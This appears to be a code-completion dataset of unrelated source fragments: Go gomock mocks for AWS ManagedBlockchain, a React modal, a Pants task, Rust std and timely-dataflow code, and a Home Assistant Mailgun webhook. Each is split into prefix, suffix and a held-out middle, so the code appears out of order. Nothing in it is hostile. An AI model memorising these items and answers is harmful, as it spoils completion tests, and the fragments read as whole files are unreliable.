func (mr *MockManagedBlockchainAPIMockRecorder) ListTagsForResourceRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListTagsForResourceRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListTagsForResourceRequest), arg0)
}
// ListTagsForResourceWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListTagsForResourceWithContext(arg0 context.Context, arg1 *managedblockchain.ListTagsForResourceInput, arg2 ...request.Option) (*managedblockchain.ListTagsForResourceOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListTagsForResourceWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.ListTagsForResourceOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListTagsForResourceWithContext indicates an expected call of ListTagsForResourceWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListTagsForResourceWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListTagsForResourceWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListTagsForResourceWithContext), varargs...)
}
// RejectInvitation mocks base method.
func (m *MockManagedBlockchainAPI) RejectInvitation(arg0 *managedblockchain.RejectInvitationInput) (*managedblockchain.RejectInvitationOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "RejectInvitation", arg0)
ret0, _ := ret[0].(*managedblockchain.RejectInvitationOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// RejectInvitation indicates an expected call of RejectInvitation.
func (mr *MockManagedBlockchainAPIMockRecorder) RejectInvitation(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "RejectInvitation", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).RejectInvitation), arg0)
}
// RejectInvitationRequest mocks base method.
func (m *MockManagedBlockchainAPI) RejectInvitationRequest(arg0 *managedblockchain.RejectInvitationInput) (*request.Request, *managedblockchain.RejectInvitationOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "RejectInvitationRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.RejectInvitationOutput)
return ret0, ret1
}
// RejectInvitationRequest indicates an expected call of RejectInvitationRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) RejectInvitationRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "RejectInvitationRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).RejectInvitationRequest), arg0)
}
// RejectInvitationWithContext mocks base method.
func (m *MockManagedBlockchainAPI) RejectInvitationWithContext(arg0 context.Context, arg1 *managedblockchain.RejectInvitationInput, arg2 ...request.Option) (*managedblockchain.RejectInvitationOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "RejectInvitationWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.RejectInvitationOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// RejectInvitationWithContext indicates an expected call of RejectInvitationWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) RejectInvitationWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "RejectInvitationWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).RejectInvitationWithContext), varargs...)
}
// TagResource mocks base method.
func (m *MockManagedBlockchainAPI) TagResource(arg0 *managedblockchain.TagResourceInput) (*managedblockchain.TagResourceOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "TagResource", arg0)
ret0, _ := ret[0].(*managedblockchain.TagResourceOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// TagResource indicates an expected call of TagResource.
func (mr *MockManagedBlockchainAPIMockRecorder) TagResource(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "TagResource", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).TagResource), arg0)
}
// TagResourceRequest mocks base method.
func (m *MockManagedBlockchainAPI) TagResourceRequest(arg0 *managedblockchain.TagResourceInput) (*request.Request, *managedblockchain.TagResourceOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "TagResourceRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.TagResourceOutput)
return ret0, ret1
}
// TagResourceRequest indicates an expected call of TagResourceRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) TagResourceRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "TagResourceRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).TagResourceRequest), arg0)
}
// TagResourceWithContext mocks base method.
func (m *MockManagedBlockchainAPI) TagResourceWithContext(arg0 context.Context, arg1 *managedblockchain.TagResourceInput, arg2 ...request.Option) (*managedblockchain.TagResourceOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "TagResourceWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.TagResourceOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// TagResourceWithContext indicates an expected call of TagResourceWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) TagResourceWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "TagResourceWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).TagResourceWithContext), varargs...)
}
// UntagResource mocks base method.
func (m *MockManagedBlockchainAPI) UntagResource(arg0 *managedblockchain.UntagResourceInput) (*managedblockchain.UntagResourceOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "UntagResource", arg0)
ret0, _ := ret[0].(*managedblockchain.UntagResourceOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// UntagResource indicates an expected call of UntagResource.
func (mr *MockManagedBlockchainAPIMockRecorder) UntagResource(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "UntagResource", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).UntagResource), arg0)
}
// UntagResourceRequest mocks base method.
func (m *MockManagedBlockchainAPI) UntagResourceRequest(arg0 *managedblockchain.UntagResourceInput) (*request.Request, *managedblockchain.UntagResourceOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "UntagResourceRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.UntagResourceOutput)
return ret0, ret1
}
// UntagResourceRequest indicates an expected call of UntagResourceRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) UntagResourceRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "UntagResourceRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).UntagResourceRequest), arg0)
}
// UntagResourceWithContext mocks base method.
func (m *MockManagedBlockchainAPI) UntagResourceWithContext(arg0 context.Context, arg1 *managedblockchain.UntagResourceInput, arg2 ...request.Option) (*managedblockchain.UntagResourceOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "UntagResourceWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.UntagResourceOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// UntagResourceWithContext indicates an expected call of UntagResourceWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) UntagResourceWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "UntagResourceWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).UntagResourceWithContext), varargs...)
}
// UpdateMember mocks base method.
func (m *MockManagedBlockchainAPI) UpdateMember(arg0 *managedblockchain.UpdateMemberInput) (*managedblockchain.UpdateMemberOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "UpdateMember", arg0)
ret0, _ := ret[0].(*managedblockchain.UpdateMemberOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// UpdateMember indicates an expected call of UpdateMember.
func (mr *MockManagedBlockchainAPIMockRecorder) UpdateMember(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "UpdateMember", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).UpdateMember), arg0)
}
// UpdateMemberRequest mocks base method.
func (m *MockManagedBlockchainAPI) UpdateMemberRequest(arg0 *managedblockchain.UpdateMemberInput) (*request.Request, *managedblockchain.UpdateMemberOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "UpdateMemberRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.UpdateMemberOutput)
return ret0, ret1
}
// UpdateMemberRequest indicates an expected call of UpdateMemberRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) UpdateMemberRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "UpdateMemberRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).UpdateMemberRequest), arg0)
}
// UpdateMemberWithContext mocks base method.
func (m *MockManagedBlockchainAPI) UpdateMemberWithContext(arg0 context.Context, arg1 *managedblockchain.UpdateMemberInput, arg2 ...request.Option) (*managedblockchain.UpdateMemberOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "UpdateMemberWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.UpdateMemberOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// UpdateMemberWithContext indicates an expected call of UpdateMemberWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) UpdateMemberWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "UpdateMemberWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).UpdateMemberWithContext), varargs...)
}
// UpdateNode mocks base method.
func (m *MockManagedBlockchainAPI) UpdateNode(arg0 *managedblockchain.UpdateNodeInput) (*managedblockchain.UpdateNodeOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "UpdateNode", arg0)
ret0, _ := ret[0].(*managedblockchain.UpdateNodeOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// UpdateNode indicates an expected call of UpdateNode.
func (mr *MockManagedBlockchainAPIMockRecorder) UpdateNode(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "UpdateNode", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).UpdateNode), arg0)
}
// UpdateNodeRequest mocks base method.
func (m *MockManagedBlockchainAPI) UpdateNodeRequest(arg0 *managedblockchain.UpdateNodeInput) (*request.Request, *managedblockchain.UpdateNodeOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "UpdateNodeRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.UpdateNodeOutput)
return ret0, ret1
}
// UpdateNodeRequest indicates an expected call of UpdateNodeRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) UpdateNodeRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "UpdateNodeRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).UpdateNodeRequest), arg0)
}
// UpdateNodeWithContext mocks base method.
func (m *MockManagedBlockchainAPI) UpdateNodeWithContext(arg0 context.Context, arg1 *managedblockchain.UpdateNodeInput, arg2 ...request.Option) (*managedblockchain.UpdateNodeOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "UpdateNodeWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.UpdateNodeOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// UpdateNodeWithContext indicates an expected call of UpdateNodeWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) UpdateNodeWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "UpdateNodeWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).UpdateNodeWithContext), varargs...)
}
// VoteOnProposal mocks base method.
func (m *MockManagedBlockchainAPI) VoteOnProposal(arg0 *managedblockchain.VoteOnProposalInput) (*managedblockchain.VoteOnProposalOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "VoteOnProposal", arg0)
ret0, _ := ret[0].(*managedblockchain.VoteOnProposalOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// VoteOnProposal indicates an expected call of VoteOnProposal.
func (mr *MockManagedBlockchainAPIMockRecorder) VoteOnProposal(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "VoteOnProposal", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).VoteOnProposal), arg0)
}
// VoteOnProposalRequest mocks base method.
func (m *MockManagedBlockchainAPI) VoteOnProposalRequest(arg0 *managedblockchain.VoteOnProposalInput) (*request.Request, *managedblockchain.VoteOnProposalOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "VoteOnProposalRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.VoteOnProposalOutput)
return ret0, ret1
}
// VoteOnProposalRequest indicates an expected call of VoteOnProposalRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) VoteOnProposalRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "VoteOnProposalRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).VoteOnProposalRequest), arg0)
}
// VoteOnProposalWithContext mocks base method.
func (m *MockManagedBlockchainAPI) VoteOnProposalWithContext(arg0 context.Context, arg1 *managedblockchain.VoteOnProposalInput, arg2 ...request.Option) (*managedblockchain.VoteOnProposalOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "VoteOnProposalWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.VoteOnProposalOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// VoteOnProposalWithContext indicates an expected call of VoteOnProposalWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) VoteOnProposalWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "VoteOnProposalWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).VoteOnProposalWithContext), varargs...)
}
| NewMockManagedBlockchainAPI |
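
The thousand-odd lines above are standard gomock output: each `Foo` method on `MockManagedBlockchainAPI` is paired with a recorder method reached through `EXPECT()`. A minimal sketch of how such a mock is typically wired into a test, assuming the usual generated constructor `NewMockManagedBlockchainAPI(ctrl)` (its name is the completion target above) and a hypothetical package name:

package managedblockchainmock // hypothetical; use the package the mock was generated into

import (
	"testing"

	"github.com/aws/aws-sdk-go/service/managedblockchain"
	"github.com/golang/mock/gomock"
)

func TestGetNetworkMock(t *testing.T) {
	ctrl := gomock.NewController(t)
	defer ctrl.Finish() // asserts every EXPECT()ed call actually happened

	m := NewMockManagedBlockchainAPI(ctrl)

	// Arrange: exactly one GetNetwork call, with any input, returning
	// an empty output and no error.
	m.EXPECT().
		GetNetwork(gomock.Any()).
		Return(&managedblockchain.GetNetworkOutput{}, nil).
		Times(1)

	// Act: code under test would normally receive m through the SDK's
	// ManagedBlockchainAPI interface; here we call it directly.
	if _, err := m.GetNetwork(&managedblockchain.GetNetworkInput{}); err != nil {
		t.Fatalf("GetNetwork: %v", err)
	}
}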
index.ts | export const foo = (x: number): number => x + 1; |
||
SubmitModal.tsx | import React from "react";
import {Input, Modal} from "antd"; |
class SubmitModal extends React.Component {
state = {
loading: false,
json: ""
};
componentDidMount() {
}
onChange(e) {
this.setState({
json: e.target.value
});
}
handleSubmit = async e => {
const {onCancel} = this.props;
try {
this.setState({
loading: true
});
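// NOTE: submitJob is assumed to be imported from an API module whose import was elided in this excerpt.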
await submitJob(this.state.json);
onCancel();
} finally {
this.setState({
loading: false
});
}
};
handleCancel = e => {
const {onCancel} = this.props;
onCancel();
};
render() {
return (
<Modal
width={1024}
visible
title="创建任务"
onOk={this.handleSubmit}
okText="提交"
confirmLoading={this.state.loading}
onCancel={this.handleCancel}
>
<TextArea rows={24} onChange={v => this.onChange(v)}/>
</Modal>
);
}
}
export default SubmitModal; |
const TextArea = Input.TextArea; |
ivy_imports.py | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants.backend.jvm.tasks.ivy_task_mixin import IvyTaskMixin
from pants.backend.jvm.tasks.nailgun_task import NailgunTask
class IvyImports(IvyTaskMixin, NailgunTask):
"""Resolves a jar of .proto files for each target in the context which has imports (ie, for each
JavaProtobufLibrary target).
"""
_CONFIG_SECTION = 'ivy-imports'
# TODO https://github.com/pantsbuild/pants/issues/604 product_types start
@classmethod
def product_types(cls):
return ['ivy_imports']
# TODO https://github.com/pantsbuild/pants/issues/604 product_types finish
@classmethod
def prepare(cls, options, round_manager):
super(IvyImports, cls).prepare(options, round_manager)
round_manager.require_data('jvm_build_tools_classpath_callbacks')
@property
def config_section(self):
return self._CONFIG_SECTION
def _str_jar(self, jar):
return 'jar' + str((jar.org, jar.name, jar.rev))
def | (self):
def nice_target_name(t):
return t.address.spec
resolve_for = self.context.targets(lambda t: t.has_label('has_imports'))
if resolve_for:
imports_map = self.context.products.get('ivy_imports')
executor = self.create_java_executor()
for target in resolve_for:
jars = target.imports
self.context.log.info('Mapping import jars for {target}: \n {jars}'.format(
target=nice_target_name(target),
jars='\n '.join(self._str_jar(s) for s in jars)))
self.mapjars(imports_map, target, executor, jars=jars)
| execute |
mod.rs | //! Platform-independent platform abstraction
//!
//! This is the platform-independent portion of the standard library's
//! platform abstraction layer, whereas `std::sys` is the
//! platform-specific portion.
//!
//! The relationship between `std::sys_common`, `std::sys` and the
//! rest of `std` is complex, with dependencies going in all
//! directions: `std` depending on `sys_common`, `sys_common`
//! depending on `sys`, and `sys` depending on `sys_common` and `std`.
//! This is because `sys_common` not only contains platform-independent code,
//! but also code that is shared between the different platforms in `sys`.
//! Ideally all that shared code should be moved to `sys::common`,
//! and the dependencies between `std`, `sys_common` and `sys` all would form a DAG.
//! Progress on this is tracked in #84187.
#![allow(missing_docs)]
#![allow(missing_debug_implementations)]
#[cfg(test)]
mod tests;
pub mod backtrace;
pub mod condvar;
pub mod fs;
pub mod io;
pub mod memchr;
pub mod mutex;
pub mod process;
pub mod remutex;
pub mod rwlock;
pub mod thread;
pub mod thread_info;
pub mod thread_local_dtor;
pub mod thread_local_key;
pub mod thread_parker;
pub mod wtf8;
cfg_if::cfg_if! {
if #[cfg(any(target_os = "l4re",
target_os = "hermit",
target_os = "xous",
feature = "restricted-std",
all(target_family = "wasm", not(target_os = "emscripten")),
all(target_vendor = "fortanix", target_env = "sgx")))] {
pub use crate::sys::net;
} else {
pub mod net;
}
}
// common error constructors
/// A trait for viewing representations from std types
#[doc(hidden)]
pub trait AsInner<Inner: ?Sized> {
fn as_inner(&self) -> &Inner;
}
/// A trait for viewing representations from std types
#[doc(hidden)]
pub trait AsInnerMut<Inner: ?Sized> {
fn as_inner_mut(&mut self) -> &mut Inner;
}
/// A trait for extracting representations from std types
#[doc(hidden)]
pub trait IntoInner<Inner> {
fn into_inner(self) -> Inner;
}
/// A trait for creating std types from internal representations
#[doc(hidden)]
pub trait FromInner<Inner> {
fn from_inner(inner: Inner) -> Self;
}
// Computes (value*numer)/denom without overflow, as long as both
// (numer*denom) and the overall result fit into i64 (which is the case
// for our time conversions). | let q = value / denom;
let r = value % denom;
// Decompose value as (value/denom*denom + value%denom),
// substitute into (value*numer)/denom and simplify.
// r < denom, so (denom*numer) is the upper bound of (r*numer)
q * numer + r * numer / denom
} | #[allow(dead_code)] // not used on all platforms
pub fn mul_div_u64(value: u64, numer: u64, denom: u64) -> u64 { |
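The comment above describes an overflow-free decomposition; a minimal Python sketch of the same arithmetic (illustrative only: Python integers do not overflow, so the u64 bound is asserted explicitly, and the sample values are made up):

def mul_div_u64_sketch(value: int, numer: int, denom: int) -> int:
    # value == q*denom + r, so value*numer/denom == q*numer + r*numer/denom
    q, r = divmod(value, denom)
    return q * numer + r * numer // denom

value, numer, denom = 2**40 + 123, 10**9, 4096   # e.g. ticks -> nanoseconds
assert value * numer >= 2**64             # the naive product would overflow u64
assert numer * denom < 2**64              # ...but the decomposed intermediates fit
assert mul_div_u64_sketch(value, numer, denom) == (value * numer) // denom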
__init__.py | """Support for Mailgun."""
import hashlib
import hmac
import json
import logging
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.const import CONF_API_KEY, CONF_DOMAIN, CONF_WEBHOOK_ID
from homeassistant.helpers import config_entry_flow
from .const import DOMAIN
_LOGGER = logging.getLogger(__name__)
CONF_SANDBOX = 'sandbox'
DEFAULT_SANDBOX = False
MESSAGE_RECEIVED = '{}_message_received'.format(DOMAIN)
CONFIG_SCHEMA = vol.Schema({
vol.Optional(DOMAIN): vol.Schema({
vol.Required(CONF_API_KEY): cv.string,
vol.Required(CONF_DOMAIN): cv.string,
vol.Optional(CONF_SANDBOX, default=DEFAULT_SANDBOX): cv.boolean,
}),
}, extra=vol.ALLOW_EXTRA)
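# For reference, a configuration dict that CONFIG_SCHEMA above accepts could
# look like this sketch (all values are placeholders):
#
#   {DOMAIN: {CONF_API_KEY: 'key-XXXX',
#             CONF_DOMAIN: 'mg.example.com',
#             CONF_SANDBOX: False}}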
async def async_setup(hass, config):
"""Set up the Mailgun component."""
if DOMAIN not in config:
return True
hass.data[DOMAIN] = config[DOMAIN]
return True
async def handle_webhook(hass, webhook_id, request):
|
async def verify_webhook(hass, token=None, timestamp=None, signature=None):
"""Verify webhook was signed by Mailgun."""
if DOMAIN not in hass.data:
_LOGGER.warning('Cannot validate Mailgun webhook, missing API Key')
return True
if not (token and timestamp and signature):
return False
hmac_digest = hmac.new(
key=bytes(hass.data[DOMAIN][CONF_API_KEY], 'utf-8'),
msg=bytes('{}{}'.format(timestamp, token), 'utf-8'),
digestmod=hashlib.sha256
).hexdigest()
return hmac.compare_digest(signature, hmac_digest)
async def async_setup_entry(hass, entry):
"""Configure based on config entry."""
hass.components.webhook.async_register(
DOMAIN, 'Mailgun', entry.data[CONF_WEBHOOK_ID], handle_webhook)
return True
async def async_unload_entry(hass, entry):
"""Unload a config entry."""
hass.components.webhook.async_unregister(entry.data[CONF_WEBHOOK_ID])
return True
# pylint: disable=invalid-name
async_remove_entry = config_entry_flow.webhook_async_remove_entry
| """Handle incoming webhook with Mailgun inbound messages."""
body = await request.text()
try:
data = json.loads(body) if body else {}
except ValueError:
return None
if isinstance(data, dict) and 'signature' in data:
if await verify_webhook(hass, **data['signature']):
data['webhook_id'] = webhook_id
hass.bus.async_fire(MESSAGE_RECEIVED, data)
return
_LOGGER.warning(
'Mailgun webhook received an unauthenticated message - webhook_id: %s',
webhook_id
) |
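To make verify_webhook concrete, this hedged sketch computes the signature Mailgun attaches to webhook payloads; the handler above recomputes exactly this HMAC and compares digests (the key and token are placeholder values):

import hashlib
import hmac
import time

api_key = 'key-XXXX'                         # placeholder, not a real key
timestamp = str(int(time.time()))
token = '0123456789abcdef'
signature = hmac.new(
    key=bytes(api_key, 'utf-8'),
    msg=bytes('{}{}'.format(timestamp, token), 'utf-8'),
    digestmod=hashlib.sha256,
).hexdigest()
# A webhook body containing {'signature': {'token': token,
# 'timestamp': timestamp, 'signature': signature}} passes verification
# when CONF_API_KEY equals api_key.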
broadcast.rs | //! Broadcast records to all workers.
use communication::Pull;
use ::ExchangeData;
use progress::nested::subgraph::{Source, Target};
use dataflow::{Stream, Scope};
use progress::ChangeBatch;
use progress::{Timestamp, Operate, Antichain};
use dataflow::channels::{Message, Bundle};
use dataflow::channels::pushers::Counter as PushCounter;
use dataflow::channels::pushers::buffer::Buffer as PushBuffer;
use dataflow::channels::pushers::Tee;
use dataflow::channels::pullers::Counter as PullCounter;
use dataflow::channels::pact::{LogPusher, LogPuller};
/// Broadcast records to all workers.
pub trait Broadcast<D: ExchangeData> {
/// Broadcast records to all workers.
///
/// # Examples
/// ```
/// use timely::dataflow::operators::{ToStream, Broadcast, Inspect};
///
/// timely::example(|scope| {
/// (0..10).to_stream(scope)
/// .broadcast()
/// .inspect(|x| println!("seen: {:?}", x));
/// });
/// ```
fn broadcast(&self) -> Self;
}
impl<G: Scope, D: ExchangeData> Broadcast<D> for Stream<G, D> {
fn broadcast(&self) -> Stream<G, D> {
let mut scope = self.scope();
let channel_id = scope.new_identifier();
let (pushers, puller) = scope.allocate::<Message<G::Timestamp, D>>(channel_id);
let (targets, registrar) = Tee::<G::Timestamp, D>::new();
assert_eq!(pushers.len(), scope.peers());
let receiver = LogPuller::new(puller, scope.index(), channel_id, scope.logging());
let operator = BroadcastOperator {
index: scope.index(),
peers: scope.peers(),
input: PullCounter::new(receiver),
output: PushBuffer::new(PushCounter::new(targets)),
};
let operator_index = scope.add_operator(Box::new(operator));
for (i, pusher) in pushers.into_iter().enumerate() {
let sender = LogPusher::new(pusher, scope.index(), i, channel_id, scope.logging());
self.connect_to(Target { index: operator_index, port: i }, sender, channel_id);
}
Stream::new(Source { index: operator_index, port: 0 }, registrar, scope)
}
}
struct BroadcastOperator<T: Timestamp, D: ExchangeData> {
index: usize,
peers: usize,
input: PullCounter<T, D, LogPuller<T, D, Box<Pull<Bundle<T, D>>>>>,
output: PushBuffer<T, D, PushCounter<T, D, Tee<T, D>>>,
}
impl<T: Timestamp, D: ExchangeData> Operate<T> for BroadcastOperator<T, D> {
fn | (&self) -> String { "Broadcast".to_owned() }
fn inputs(&self) -> usize { self.peers }
fn outputs(&self) -> usize { 1 }
fn get_internal_summary(&mut self) -> (Vec<Vec<Antichain<T::Summary>>>, Vec<ChangeBatch<T>>) {
// TODO: (optimization) some of these internal paths do not actually exist
let summary = (0..self.peers).map(|_| vec![Antichain::from_elem(Default::default())]).collect::<Vec<_>>();
(summary, vec![ChangeBatch::new()])
}
fn pull_internal_progress(&mut self, consumed: &mut [ChangeBatch<T>],
_internal: &mut [ChangeBatch<T>],
produced: &mut [ChangeBatch<T>]) -> bool {
let mut vec = Vec::new();
while let Some(bundle) = self.input.next() {
use communication::message::RefOrMut;
match bundle.as_ref_or_mut() {
RefOrMut::Ref(bundle) => {
RefOrMut::Ref(&bundle.data).swap(&mut vec);
self.output.session(&bundle.time).give_vec(&mut vec);
},
RefOrMut::Mut(bundle) => {
self.output.session(&bundle.time).give_vec(&mut bundle.data);
},
}
}
self.output.cease();
self.input.consumed().borrow_mut().drain_into(&mut consumed[self.index]);
self.output.inner().produced().borrow_mut().drain_into(&mut produced[0]);
false
}
fn notify_me(&self) -> bool { false }
}
| name |
main.rs | // Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0 OR MIT
#![feature(core_intrinsics)]
use std::intrinsics::{
atomic_or, atomic_or_acq, atomic_or_acqrel, atomic_or_rel, atomic_or_relaxed,
};
fn main() | {
let mut a1 = 1 as u8;
let mut a2 = 1 as u8;
let mut a3 = 1 as u8;
let mut a4 = 1 as u8;
let mut a5 = 1 as u8;
let ptr_a1: *mut u8 = &mut a1;
let ptr_a2: *mut u8 = &mut a2;
let ptr_a3: *mut u8 = &mut a3;
let ptr_a4: *mut u8 = &mut a4;
let ptr_a5: *mut u8 = &mut a5;
let b = 0 as u8;
let c = 1 as u8;
unsafe {
let x1 = atomic_or(ptr_a1, b);
let x2 = atomic_or_acq(ptr_a2, b);
let x3 = atomic_or_acqrel(ptr_a3, b);
let x4 = atomic_or_rel(ptr_a4, b);
